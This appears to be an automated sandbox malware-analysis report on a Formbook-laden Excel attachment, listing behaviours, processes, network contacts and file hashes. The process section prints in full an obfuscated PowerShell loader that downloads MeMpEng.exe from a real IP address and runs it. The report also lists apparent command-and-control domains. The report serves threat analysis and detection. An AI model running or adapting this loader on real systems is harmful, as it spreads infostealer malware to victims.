Malware Analysis Report

2025-01-18 12:23

Sample ID 240829-gj64yaydkn
Target PO-014842-2.xls
SHA256 b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

Threat Level: Known bad

The file PO-014842-2.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Formbook

Process spawned unexpected child process

Formbook payload

Evasion via Device Credential Deployment

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Suspicious use of SetThreadContext

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Enumerates system info in registry

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 05:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 05:51

Reported

2024-08-29 05:53

Platform

win7-20240705-en

Max time kernel

149s

Max time network

138s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 320 set thread context of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1580 set thread context of 1256 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\Explorer.EXE
PID 2188 set thread context of 1256 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2696 wrote to memory of 3044 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 596 wrote to memory of 3024 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 3024 wrote to memory of 1072 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 596 wrote to memory of 320 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 320 wrote to memory of 1580 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1256 wrote to memory of 2188 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2908 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1315.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1314.tmp"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\SysWOW64\explorer.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 173.222.211.43:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.18.190.71:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.ontosdabiblia.online udp
US 8.8.8.8:53 www.3tcxr.xyz udp
US 8.8.8.8:53 www.ianju-ljef097.vip udp
US 8.8.8.8:53 www.anifestmindset.net udp
US 8.8.8.8:53 www.5ldym2.shop udp

Files

memory/2164-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2164-1-0x0000000072BED000-0x0000000072BF8000-memory.dmp

memory/2696-16-0x00000000001F0000-0x00000000001F2000-memory.dmp

memory/2164-17-0x0000000002430000-0x0000000002432000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\Local\Temp\CabD69.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 534bd99e6dce3f8e39411bc94ae98ed4
SHA1 5e322b728f5f54432676a7ac363410d18d21e7b7
SHA256 f12c730a786b665bc5ffd38bf5e5304200fe027e3d447ff41d88b0820e3a6076
SHA512 eb12556f0ac6e503316b7fe374fd7c48db7a026dd1d1fe63c3b02ac6e862fb804868ee9afe66b2ae0d9f68cc04e0bba65c3d8e7670415ff6790c3e81a941da9e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 9549a9df6fb8e5461fa607946d9c9748
SHA1 d3bd6f0f2de6ed62e308d4f922a59c3724f237e9
SHA256 f12d576691cd566f1efa4138379c523e4ad042a0229e1f56a1e3e5796d805cb6
SHA512 bf8c9fb45c394ed349430c0c839c45a387e754ccaa3e8cdeb3a7cc97b6b8ccbaa7e7dff0b82ac0eb26ef214a8155b00a69931510566b0d7e3ff1d5957f9ede6a

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5J67VDZD\IEnetworthUpdated[1].hta

MD5 87635cf66104074c53e698677de6002b
SHA1 958ba282403c968f0dc8631aa396b8a73612ffe3
SHA256 4768f32e03962166a83fab45ea2e5865291e66bff359c547573ca34da6fe78cf
SHA512 7976b9820a1494953d6b99982e696a9faed599bc8ec932e92285ab10eb5db8d6ff76794309d062c8e8410e1142d06f75a70c417ea646e0adb5b42a2c55a3e31d

\??\c:\Users\Admin\AppData\Local\Temp\nsfvyqgd.cmdline

MD5 4eda8a94dbf86bb66f8d20cd21aaad8e
SHA1 eb3c28587b33168462da935058ff9801bf4c6d2a
SHA256 1fc1f6b99ecfbf2052b92ef27d4133864a7b3dc2ad95765d296e18388f7e1a6d
SHA512 0d95d10746f0af83b4c71a35b6b94a587f2e97c2cf20c8cd662ed1d37c20d90543edb67c698d54e019fe6cbb457befd50d6f39da82a22927305d48dd4e0ac3d9

\??\c:\Users\Admin\AppData\Local\Temp\nsfvyqgd.0.cs

MD5 f2a64cd1f09c060d9412d84239f92021
SHA1 8053849b3e79d63181b74207b19e76775a248982
SHA256 2f6ec9f074eca2e37185fbec988ed8bd98be664feeec718f77cc489413ddd1d7
SHA512 f7661e45c4752e6457741d1bd753e25e1b624fd0c85062b74c0a8d0334c4b7a7fb4ef58295b31607ad427b08d8b87b730025b33fbd3b60041af83e29dbb95513

\??\c:\Users\Admin\AppData\Local\Temp\CSC1314.tmp

MD5 1b4f65611ebc13e5b7a5198551084ff7
SHA1 89e7d3f5e0df7cb5bf20c723b7e73d9318c9f285
SHA256 aa8d9b46f7b688268f7a22eeca331325fda1ebe9ff83d3b45b022648622eb996
SHA512 5ff43c55ba5e2078cc8564eec8f1de11dc765e0efacf7fa9f1bea40c6a236578aeb596c876513df8b491f760b66244976b9b62d48392aa74f305ebb464bf4954

C:\Users\Admin\AppData\Local\Temp\RES1315.tmp

MD5 add1b3eb87540c5e6cff33722db2a32e
SHA1 637d4bc402cdb9c12e1a9dcab2c4b62db80cc471
SHA256 a709d5ad70c519880139406b1a35b6308a760bcf41775f4d8344f71b909bed84
SHA512 8197cd854351cf27e2eb5dcce0d30aac4b5a6c587152527bdcd2f8f7aee63532c74e90a6c5eede03d6f654fbdcf3b0c10760e9a9d8b0cba55d7f387d1b04b54d

C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.dll

MD5 31dfc3cd590af0c5630dd31bf6695053
SHA1 70e083b9537bda9f08985ce0637c24032dc305ac
SHA256 d71d8aa1c81f7c4a8a93aedef302418a9a213858f7ee8c5b4152b828c39fd9e7
SHA512 4e9738b591e75149ee22698e0a414a9ab5baa13ad439dbbc0bc1e245d749ad43217d7c83e285949ae9fd2792066609b06893da79f865bf6bc93aae1d99332083

C:\Users\Admin\AppData\Local\Temp\nsfvyqgd.pdb

MD5 948fcf44ad78a7efdfed5cec6e8e2878
SHA1 c93e73caec310d62a21287c053d3802da4c8e4e4
SHA256 95bd08f3d4e27014c30681fa43bd471f9a356d681c0dd28b699d59bad9fe0e97
SHA512 d35fdcbc397e478aa0b1e54d4c3d3ba3db7ba397f46bb406e713a88693a93dd046901e615db9af963ad3a348721de0a1b08fb3039ed2bec346baacc94686caab

\Users\Admin\AppData\Roaming\MeMpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/320-61-0x0000000000DF0000-0x0000000000E8C000-memory.dmp

memory/2164-62-0x0000000072BED000-0x0000000072BF8000-memory.dmp

memory/320-63-0x00000000004B0000-0x00000000004C8000-memory.dmp

memory/320-64-0x00000000047B0000-0x0000000004826000-memory.dmp

memory/1580-65-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1580-70-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1580-69-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1580-67-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2188-74-0x0000000000AE0000-0x0000000000D61000-memory.dmp

memory/2188-75-0x00000000000E0000-0x000000000010F000-memory.dmp

memory/1256-78-0x0000000004BD0000-0x0000000004C8F000-memory.dmp

memory/2164-86-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2164-89-0x0000000072BED000-0x0000000072BF8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 05:51

Reported

2024-08-29 05:53

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

127s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5024 wrote to memory of 2012 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 5024 wrote to memory of 2012 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

